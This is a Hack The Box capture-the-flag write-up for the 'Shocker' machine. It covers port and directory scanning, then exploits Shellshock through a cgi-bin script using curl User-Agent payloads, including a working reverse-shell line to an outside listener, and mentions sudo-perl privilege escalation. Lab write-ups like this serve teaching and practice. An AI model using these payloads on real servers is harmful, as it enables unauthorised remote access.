Hack The Box: Shocker


Enumeration

box shocker

nmap reveals two open ports: 80 and 2222.

PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.18 (Ubuntu)
2222/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 c4:f8:ad:e8:f8:04:77🇩🇪cf:15:0d:63:0a:18:7e:49 (RSA)
|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

The full port scan didn’t reveal any further open ports. Port 80 shows a kind of cute website:

box shocker


Next, I tried a number of things, including user enumeration for the SSH version (threw a lot of false positives) and optionsbleed for apache. In the end, I checked the Hackthebox-Forum for some hints and learned about the shell shocker vulnerability, which is apparently affecting shell scripts hosted in the cgi-bin folder of apache webservers.

So I scanned specifically for the .sh file extension in <ip>/cgi-bin/ and got a hit for user.sh:

===============================================================
[+] Url:                     http://10.129.215.237/cgi-bin/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirb/wordlists/big.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.2.0-dev
[+] Extensions:              sh
[+] Timeout:                 10s
===============================================================
2022/11/10 14:08:23 Starting gobuster in directory enumeration mode
===============================================================
^M^[[2K/.htaccess            (Status: 403) [Size: 306]
^M^[[2K/.htpasswd            (Status: 403) [Size: 306]
^M^[[2K/.htpasswd.sh         (Status: 403) [Size: 309]
^M^[[2K/.htaccess.sh         (Status: 403) [Size: 309]
^M^[[2K/user.sh              (Status: 200) [Size: 118]

We can even download the output of the script:

Content-Type: text/plain

Just an uptime test script

 14:53:56 up  3:49,  0 users,  load average: 0.10, 0.03, 0.01

Next, I checked the POC from this blogpost and it worked:

$ curl -H "User-agent: () { :;}; echo; echo vulnerable" http://10.129.215.237/cgi-bin/user.sh
vulnerable
...

which basically shows that we can inject arbitrary code into the user-agent, for example a reverse shell.

$ curl -H  "User-agent: () { :;}; /bin/bash -i >& /dev/tcp/10.10.14.31/443 0>&1"  http://10.129.215.237/cgi-bin/user.sh

And with this, we get access as user shelly:

listening on [any] 443 ...
connect to [10.10.14.31] from (UNKNOWN) [10.129.215.237] 55684
bash: no job control in this shell
shelly@Shocker:/usr/lib/cgi-bin$ id
id
uid=1000(shelly) gid=1000(shelly) groups=1000(shelly),4(adm),24(cdrom),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)
shelly@Shocker:/usr/lib/cgi-bin$ 

The privilege escalation is super easy: The user has sudo permissions on the perl binary, and with help of GTFObins we escalate to root and are done.